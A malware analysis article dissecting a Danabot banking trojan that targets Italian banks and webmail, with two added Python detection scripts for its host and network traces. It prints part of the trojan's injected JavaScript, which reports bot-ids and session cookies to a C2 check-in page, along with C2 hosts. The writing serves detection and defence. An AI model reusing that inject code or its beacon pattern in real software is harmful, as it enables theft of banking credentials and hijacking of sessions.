Analyzing a Danabot Payload that is targeting Italy

Pierluigi Paganini December 20, 2018

A new variant of the infamous Danabot botnet hit Italy; experts at Cybaze-Yoroi ZLab dissected one of the samples that targeted entities in Italy.

In the last weeks, a new variant of the infamous Danabot botnet hit Italy. Security firms such as Proofpoint and Eset analyzed other samples of the same threat targeting the Australian landscape back in May 2018 and, more recently, Italy. The Cybaze-Yoroi ZLab dissected one of these recent Danabot variants spread across the Italian cyberspace leveraging “Fattura” themed phishing emails (e.g. N051118), where the malicious payload was dropped abusing a macro-enabled Word document able to download the malicious DLL payload.

Technical Analysis

The malware tries to connect to the remote host 149.154.157.104 (EDIS-IT IT) through an encrypted SSL channel, then it downloads other components and deletes itself from the filesystem. Meanwhile, it sets up a system service under the “HKLM\SYSTEM\CurrentControlSet\Services” registry key. These registry keys are responsible for loading the dynamically linked libraries stored in the “read only” and “hidden” folder “C:\ProgramData\D93C2DAC”.

Figure 1. Registry key created by malware
Figure 2: Complete malware implant folder.

This hidden folder contains two other components in execution, “D93C2D32.dll” and “D93C2D64.dll”. They are the same component compiled for 32-bit and 64-bit respectively, executed through the rundll32.exe process according to the architecture of the compromised host.

The malware implant loads the library at least two times, with different parameters each time, depending on the exported function called:

Figure 3. Exported functions by the malicious dll
Figure 4. Example of execution of the malware

As shown in Fig. 3, the malware exports eight key functions: “f1”, “f2”, “f3”, “f4”, “f5”, “f6”, “f7” and “f8”. The “f1” function is responsible for installing the malware implant on the victim machine: it works as an installation routine and enables the execution of the other ones. The two functions that keep the malware alive within the system are “f4” and “f5”: the “f5” function sets a system forwarding proxy on local port 1080, so that all communication between the victim computer and the Internet passes through the proxy, enabling the malware to intercept and modify the network traffic. The “f4” function, instead, manages the traffic and performs a Man-In-The-Browser attack. Every DNS request from the victim computer to the Internet that matches the list of banking sites hard-coded in the malware will be modified: the malware adds to the original page a piece of JavaScript to steal sensitive information such as username, password and session cookie.

Figure 5. Listening proxy in execution

During the execution of the functions above, the malware also searches for sensitive information stored in the data folder of the installed web browsers, like Google Chrome and Mozilla Firefox. It gathers saved credentials and stores them in a temporary sqlite database located in “C:\WINDOWS\TEMP” path.

Figure 6. Temporary SQLite database with stolen credentials
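As a defender-side illustration of the persistence, proxy and credential-staging behaviour described above, here is an added Python example (not code from the original analysis or from the Yoroi team): a small scanner that runs a handful of detection rules over constructed, Sysmon-style events. The service name (EXAMPLE_SVC), the sqlite file name and the benign rundll32 control line are assumptions invented for the sample; the ProgramData folder, the DLL names, the f1..f8 exports, local port 1080 and the C:\WINDOWS\TEMP path are taken from the text.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events in a simplified key="value" format modelled loosely on
# Sysmon event fields. Every line is invented for this example: the service name,
# the sqlite file name and the benign control line are assumptions; the folder,
# DLL names, export names, proxy port and TEMP path come from the analysis.
SAMPLE_EVENTS = [
    'type=RegistrySet target="HKLM\\SYSTEM\\CurrentControlSet\\Services\\EXAMPLE_SVC\\ImagePath" '
    'value="rundll32.exe C:\\ProgramData\\D93C2DAC\\D93C2D64.dll,f1"',
    'type=RegistrySet target="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer" '
    'value="127.0.0.1:1080"',
    'type=ProcessCreate image="C:\\Windows\\System32\\rundll32.exe" '
    'cmdline="rundll32.exe C:\\ProgramData\\D93C2DAC\\D93C2D32.dll,f4"',
    'type=FileCreate image="C:\\Windows\\System32\\rundll32.exe" '
    'target="C:\\WINDOWS\\TEMP\\tmpA1B2.sqlite"',
    # Benign control: rundll32 loading a system DLL from System32 must not fire.
    'type=ProcessCreate image="C:\\Windows\\System32\\rundll32.exe" '
    'cmdline="rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# rundll32 loading a DLL from a ProgramData subfolder and calling one of the f1..f8 exports
RUNDLL_PROGRAMDATA_RE = re.compile(
    r"rundll32(?:\.exe)?\s+c:\\programdata\\[^\\,]+\\[^\\,]+\.dll,f[1-8]\b", re.IGNORECASE)
LOCAL_PROXY_RE = re.compile(r"^(?:127\.0\.0\.1|localhost):1080$", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" line into a dict (quoted values are unquoted)."""
    return {k: (q or bare) for k, q, bare in FIELD_RE.findall(line)}


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules the event satisfies."""
    hits: List[str] = []
    etype = event.get("type", "")
    target = event.get("target", "")
    value = event.get("value", "")
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")

    # Persistence: a service ImagePath that loads a DLL from ProgramData via rundll32.
    if (etype == "RegistrySet"
            and "\\currentcontrolset\\services\\" in target.lower()
            and target.lower().endswith("\\imagepath")
            and RUNDLL_PROGRAMDATA_RE.search(value)):
        hits.append("service_rundll32_programdata")

    # Execution: rundll32 invoking one of the f1..f8 exports from ProgramData.
    if etype == "ProcessCreate" and RUNDLL_PROGRAMDATA_RE.search(cmdline):
        hits.append("rundll32_programdata_export")

    # Traffic interception: the system proxy pointed at a local listener on port 1080.
    if (etype == "RegistrySet"
            and target.lower().endswith("\\internet settings\\proxyserver")
            and LOCAL_PROXY_RE.match(value)):
        hits.append("local_proxy_1080")

    # Credential staging: rundll32 writing an sqlite database into C:\WINDOWS\TEMP.
    if (etype == "FileCreate"
            and image.endswith("\\rundll32.exe")
            and target.lower().startswith("c:\\windows\\temp\\")
            and target.lower().endswith(".sqlite")):
        hits.append("rundll32_temp_sqlite")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over every line; return (line_index, rule_name) pairs."""
    findings: List[Tuple[int, str]] = []
    for i, line in enumerate(lines):
        for rule in match_rules(parse_event(line)):
            findings.append((i, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"line {idx}: {rule}")
```

None of the four rules is a strong signal on its own (a local proxy on 1080 is also what a SOCKS client sets), but the combination of a ProgramData service DLL, an f1..f8 export name, a localhost proxy and an sqlite file written by rundll32 into TEMP is the profile this sample leaves on a host and is easy to translate into a SIEM correlation.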


Man in the Browser

To perform man in the browser attack, the malware sets a system forward proxy as shown in Fig.7. This way, it inspects all incoming and outgoing internet traffic. When the victim requests a specific web page related to one of the targeted sites, the malware injects a custom javascript code into the page in order to intercept and exfiltrate sensitive user information such as personal details, credentials and PAN numbers. The proxy is managed by the “f4” function of the malicious dll.

Figure 7. Proxy setting
Figure 8. Snippet from malware configuration

By extracting the man-in-the-browser configuration from the malware sample, we retrieved the complete list of the intercepted web pages, revealing that the malware is targeting the customers of a wide range of financial institutions: most of them are Italian banking companies such as Bancoposte, Intesa San Paolo, Banca Generali, BNL, Hello Bank, UBI Banca, etc. Besides the banking web sites, a set of email providers is also targeted by the malware, for instance general purpose webmail providers such as Tim, Yahoo, Hotmail, GMail, and other more specific email services related to Italian real estate companies such as Tecnocasa.

Further details about the targeted organizations can be found at the bottom of the article.

Figure 8. Banking website without js injection
Figure 9: Banking website with js injection

Web-Inject

The malicious JavaScript injected into the web pages sends the stolen information to the C2, including the victim's session cookie, in order to hijack already authenticated sessions. The snippet of code below shows the webinject code downloaded from “http://equityfloat[.]pw/hc/myjs28frr_s51.js”.

Figure 10: Downloaded JavaScript from equityfloat[.]pw C2

The web inject code checks in to a malicious PHP resource, “/my9rep/777.php”, sending bot-id details and the current session cookies.

// Default C2 origin, immediately overridden with the host of the page currently
// being viewed, so the check-in below is addressed to the visited site itself
var wwww = 'https://equityfloat.pw/';
wwww = "https://" + document.location.host + "/";
// Fake "please wait" banner (Polish text); its <img> tag requests the
// imgto=wait resource from /my9rep/777.php
var waitdiv = "<center id=\"fkwt\" class=\"fkwt\"> <br/> Poczekaj aż Twój komputer zostanie zidentyfikowany. Może to potrwać trochę czasu... <br/><img src=\"" + wwww + "/my9rep/777.php?imgto=wait\"></img></center>";
var waitfk = "";
// Fake "system maintenance" notice (Polish text)
var waitlok = "<div><center> <br/> Prowadzone sa prace modernizacyjne w celu jak najszybszego przywrocenia dzialania systemu.<br/>Przyblizony czas modernizacji wynosi kilka godzin.<br/>Przepraszamy za tymczasowe utrudnienie i niedogodnosci.<br/><center></div>";

// Campaign tag and bot-id; the bot-id is read from the data-botid attribute
// of the element with id "myjs1" using the custom jQuery-like helper my7ajx
var netbot = "frr";
var rem777bname2 = "";
var tbid = my7ajx("#myjs1[data-botid]");
if (tbid.length > 0) rem777bname2 = tbid.attr("data-botid");
var loca = location.href;
var tyyp = true;

// Check-in URL: targeted host (typ), campaign tag (sub) and bot-id (inf)
var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;

// State used by the form-grabbing logic that follows in the full script
var args = {};
var tmp1;
var tkstate = 1;
var lg = "",
    ps = "",
    tk = "";
var lgf;
var pss;
var tabl;
var tabltr;
var btn;
var clickfnc;
var ansq = false;

In particular, we can see that the malware sets the bot-id of the infected machine using a custom jQuery-like selector: “var tbid=my7ajx(“#myjs1[data-botid]”);”. This bot-id is concatenated into the path of the PHP page on the C2 “equityfloat[.]com”.

var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;

This way, the attacker is informed about the successful injection of the MitB agent.
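To show what the check-in just described looks like from the network side, here is an added Python example (not part of the original article or the Yoroi report) that classifies constructed proxy log lines by the inject's own URL shapes: the fetch of the inject script from the C2, the /my9rep/777.php check-in with the typ/sub/b/inf parameters, and the imgto=wait image beacon. Host names and bot-ids in the sample log are invented placeholders; the script URL, beacon path and parameter names come from the snippet above. Because the inject concatenates "https://host/" with "/my9rep/…", the resulting URL carries a double slash, which the classifier normalises, and it also keeps a blank inf= value so a check-in without a bot-id is still reported.

```python
import re
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines ("METHOD URL STATUS"). Host names and bot-ids are
# invented; the C2 script URL, beacon path and parameter names come from the inject.
SAMPLE_LOG = [
    "GET https://equityfloat.pw/hc/myjs28frr_s51.js 200",
    "GET https://bank.example//my9rep/777.php?typ=bank.example&sub=frr&b=2&inf=BOT-0001 200",
    "GET https://bank.example//my9rep/777.php?imgto=wait 200",
    "GET https://bank.example/login 200",
    # data-botid attribute missing on the page: the inject still sends an empty inf=
    "GET https://webmail.example//my9rep/777.php?typ=webmail.example&sub=frr&b=2&inf= 200",
    "GET https://webmail.example//my9rep/777.php?typ=webmail.example&sub=frr&b=2&inf=BOT-0002 200",
]

BEACON_PATH = "/my9rep/777.php"
INJECT_SCRIPT_HOSTS = {"equityfloat.pw"}  # C2 host serving the inject script
LOG_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def classify(line: str) -> Optional[Dict[str, str]]:
    """Classify one log line; return a finding dict, or None for unremarkable traffic."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    host = (parts.hostname or "").lower()
    # The inject builds wwww + "/my9rep/...", and wwww already ends with "/", so the
    # path arrives as "//my9rep/777.php"; collapse the leading slashes before matching.
    path = "/" + parts.path.lstrip("/")
    # keep_blank_values so an empty inf= (no bot-id found on the page) is still seen
    qs = parse_qs(parts.query, keep_blank_values=True)

    if host in INJECT_SCRIPT_HOSTS:
        return {"kind": "inject_script_fetch", "host": host, "path": path}
    if path.lower() != BEACON_PATH:
        return None
    if "imgto" in qs:
        return {"kind": "wait_image_beacon", "host": host, "imgto": qs["imgto"][0]}
    if {"typ", "sub", "b", "inf"}.issubset(qs):
        return {
            "kind": "checkin",
            "host": host,
            "target_site": qs["typ"][0],
            "campaign": qs["sub"][0],
            "bot_id": qs["inf"][0],
        }
    return {"kind": "beacon_path_other", "host": host}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return a finding for every line that matches one of the inject's URL shapes."""
    return [f for f in (classify(line) for line in lines) if f]


def bot_ids(lines: List[str]) -> Set[str]:
    """Collect the non-empty bot-ids seen in check-ins, to scope how many hosts are affected."""
    return {f["bot_id"] for f in scan(lines) if f["kind"] == "checkin" and f["bot_id"]}


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The check-in is keyed on the path and parameter names rather than on the host, because the script addresses the request to whatever site the victim is visiting; the typ parameter therefore doubles as a list of which targeted sites each bot has actually reached.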

Conclusion

The Danabot threat expanded its activities into the Italian landscape during the last year, especially in November 2018 (ref. EW N051118), when a massive attack wave was intercepted during CSDC security monitoring operations. The specific configuration extracted from the analyzed sample is another clear indication of the increasing criminal interest in Italian users and organizations, not limited to the traditional banking sector.

Moreover, this particular November wave may also have originated from the same threat actor responsible for past Gootkit attack waves, internally referenced as TH-106. In fact, according to the CERT-PA technical analysis, this actor may decide to pursue its malicious objectives leveraging another malware toolkit, showing adaptive capabilities that lower the chance of being taken down.

Further data, including IoCs and Yara rules, are available in the report published on the Yoroi blog.


Pierluigi Paganini

(SecurityAffairs – malware, Danabot)
